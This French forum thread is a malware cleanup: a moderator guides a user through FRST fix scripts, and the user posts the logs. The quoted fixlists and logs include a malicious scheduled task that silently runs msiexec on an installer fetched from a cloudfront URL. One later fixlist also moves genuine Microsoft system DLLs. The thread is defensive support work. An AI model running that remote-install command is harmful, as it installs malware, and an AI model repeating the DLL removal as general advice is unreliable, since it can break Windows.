Fenêtre DOS qui s'ouvre et qui se referme au démarrage
Résolu/Fermé
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
-
21 mai 2017 à 23:23
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 28 mai 2017 à 12:50
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 28 mai 2017 à 12:50
A voir également:
- Winio64.sys
- Pc lent au démarrage - Guide
- Application qui s'ouvre au démarrage - Guide
- Forcer demarrage pc - Guide
- Reinitialiser pc au demarrage - Guide
- Écran noir au démarrage - Guide
5 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
22 mai 2017 à 00:42
22 mai 2017 à 00:42
Salut,
Vide la queue BITS : https://www.malekal.com/supprimer-fenetre-noire-cmd-windows/
Vide la queue BITS : https://www.malekal.com/supprimer-fenetre-noire-cmd-windows/
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
22 mai 2017 à 09:36
22 mai 2017 à 09:36
Dans ce cas il faut suivre ce tuto : https://www.malekal.com/comment-trouver-source-ouvertures-cmd-exe/
Pour trouver la source des commandes cmd.
Faut laisser tourner le programme qui enregistre l'activité système jusqu'à ce qu'une fenêtre cmd et déterminer la source.
Si tu n'arrives pas à t'en sortir pour trouver la source.
Enregistre le contenu par le menu File / Save.
Et tu partages le fichier via un hébergeur.
Eventuellement :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Pour trouver la source des commandes cmd.
Faut laisser tourner le programme qui enregistre l'activité système jusqu'à ce qu'une fenêtre cmd et déterminer la source.
Si tu n'arrives pas à t'en sortir pour trouver la source.
Enregistre le contenu par le menu File / Save.
Et tu partages le fichier via un hébergeur.
Eventuellement :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 14:16
22 mai 2017 à 14:16
Bonjour,
merci pour commencer pour avoir répondu,
étant donné que la fenêtre DOS ne s'ouvre qu'au démarrage je pense que la première méthode ne fonctionnera pas.
Aussi, voici les rapports de la deuxième méthode :
Addition :
https://pjjoint.malekal.com/files.php?id=20170522_d6w11v10b9l7
FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20170522_h7h13m9x5i13
Shortcut :
https://pjjoint.malekal.com/files.php?id=20170522_q8h10f13y5d14
En vous remerciant par avance,
merci pour commencer pour avoir répondu,
étant donné que la fenêtre DOS ne s'ouvre qu'au démarrage je pense que la première méthode ne fonctionnera pas.
Aussi, voici les rapports de la deuxième méthode :
Addition :
https://pjjoint.malekal.com/files.php?id=20170522_d6w11v10b9l7
FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20170522_h7h13m9x5i13
Shortcut :
https://pjjoint.malekal.com/files.php?id=20170522_q8h10f13y5d14
En vous remerciant par avance,
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié le 22 mai 2017 à 15:28
Modifié le 22 mai 2017 à 15:28
si la procédure est à suivre, même si ce n'est pas au démarrage.
de toue façon, y a des restes d'infection, FRST devrait vider la liste d'attente BITS.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
Veuillez appuyer sur une touche pour continuer la désinfection...
de toue façon, y a des restes d'infection, FRST devrait vider la liste d'attente BITS.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
Veuillez appuyer sur une touche pour continuer la désinfection...
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 15:54
22 mai 2017 à 15:54
Voici le contenu du rapport :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Exécuté par bilal (22-05-2017 15:37:32) Run:1
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Lync => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\9CYN1PY8WAS3CDY => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CDUWOLOHGW0LTBK => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GHMKZEL5OM4KXJQ => valeur supprimé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => déplacé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Auhardwaregl.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\Uefochubsrv.sys => déplacé(es) avec succès
C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{66310752-3AB0-63C8-96E8-53E86728FC0D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Jernearaloied => clé supprimé(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 55956324 B
Java, Flash, Steam htmlcache => 26696 B
Windows/system/drivers => 17577444 B
Edge => 4152537 B
Chrome => 733746 B
Firefox => 13953314 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 28010 B
NetworkService => 1074912 B
bilal => 1043214474 B
RecycleBin => 131888299 B
EmptyTemp: => 1.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 22-05-2017 15:40:14)
C:\Windows\System32\Drivers\etc\hosts => a été déplacé(e) avec succès
Impossible de restaurer Hosts.
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Exécuté par bilal (22-05-2017 15:37:32) Run:1
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Lync => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\9CYN1PY8WAS3CDY => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CDUWOLOHGW0LTBK => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GHMKZEL5OM4KXJQ => valeur supprimé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => déplacé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Auhardwaregl.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\Uefochubsrv.sys => déplacé(es) avec succès
C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{66310752-3AB0-63C8-96E8-53E86728FC0D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Jernearaloied => clé supprimé(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 55956324 B
Java, Flash, Steam htmlcache => 26696 B
Windows/system/drivers => 17577444 B
Edge => 4152537 B
Chrome => 733746 B
Firefox => 13953314 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 28010 B
NetworkService => 1074912 B
bilal => 1043214474 B
RecycleBin => 131888299 B
EmptyTemp: => 1.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 22-05-2017 15:40:14)
C:\Windows\System32\Drivers\etc\hosts => a été déplacé(e) avec succès
Impossible de restaurer Hosts.
Fin de Fixlog 15:40:14
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 15:56
22 mai 2017 à 15:56
J'ai du coup réparé Mozilla Firefox, mais internet explorer n'est plus sur mon ordinateur depuis hier (mon antivirus a dû le supprimer suite à une éventuelle infection).
Merci, je vais de ce pas appliquer la méthode n°1 proposée plus haut.
Merci, je vais de ce pas appliquer la méthode n°1 proposée plus haut.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 16:24
22 mai 2017 à 16:24
ok vois ce que cela donne ensuite =)
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 18:51
22 mai 2017 à 18:51
Bon alors accrochez-vous voici ce que j'ai fait :
J'ai lancé le logiciel Procmon afin de détecter la fameuse anomalie mais j'ai rien trouvé à part qu'un logiciel "Dragon msi center" essayait de se lancer à chaque session..
J'ai donc lancé ce logiciel à part et il ne fonctionnait pas! Du coup je suis aller le désinstaller sur le panneau de configuration... Mais rien ! impossible de le désinstaller il y a une erreur : "1628 : Failed to compile installation"
J'ai ensuite trouvé sur internet que pour résoudre cette erreur une des solution consistait à renommer le fichier InstallShield se trouvant dans Programmefiles(x86)/CommonFiles/InstallShield
Sauf que je ne l'ai pas, en fait plusieurs logiciels malveillants ont été désinstallés il n'y a pas longtemps et j'ai du supprimer le fichier avec... quelle stupidité!
Je ne trouve pas de moyen pour le réinstaller !
J'ai lancé le logiciel Procmon afin de détecter la fameuse anomalie mais j'ai rien trouvé à part qu'un logiciel "Dragon msi center" essayait de se lancer à chaque session..
J'ai donc lancé ce logiciel à part et il ne fonctionnait pas! Du coup je suis aller le désinstaller sur le panneau de configuration... Mais rien ! impossible de le désinstaller il y a une erreur : "1628 : Failed to compile installation"
J'ai ensuite trouvé sur internet que pour résoudre cette erreur une des solution consistait à renommer le fichier InstallShield se trouvant dans Programmefiles(x86)/CommonFiles/InstallShield
Sauf que je ne l'ai pas, en fait plusieurs logiciels malveillants ont été désinstallés il n'y a pas longtemps et j'ai du supprimer le fichier avec... quelle stupidité!
Je ne trouve pas de moyen pour le réinstaller !
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 22:33
22 mai 2017 à 22:33
ok,
pour la fenêtre cmd ça donne quoi ?
pour la fenêtre cmd ça donne quoi ?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
25 mai 2017 à 11:13
25 mai 2017 à 11:13
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
26 mai 2017 à 16:10
26 mai 2017 à 16:10
Bonjour,
Voici le contenu du fichier texte :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par bilal (26-05-2017 16:06:28) Run:2
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
WINIO => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WINIO => clé supprimé(es) avec succès
WINIO => service supprimé(es) avec succès
C:\ProgramData\Gaming Center => déplacé(es) avec succès
C:\Program Files (x86)\MSI\Dragon Gaming Center => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
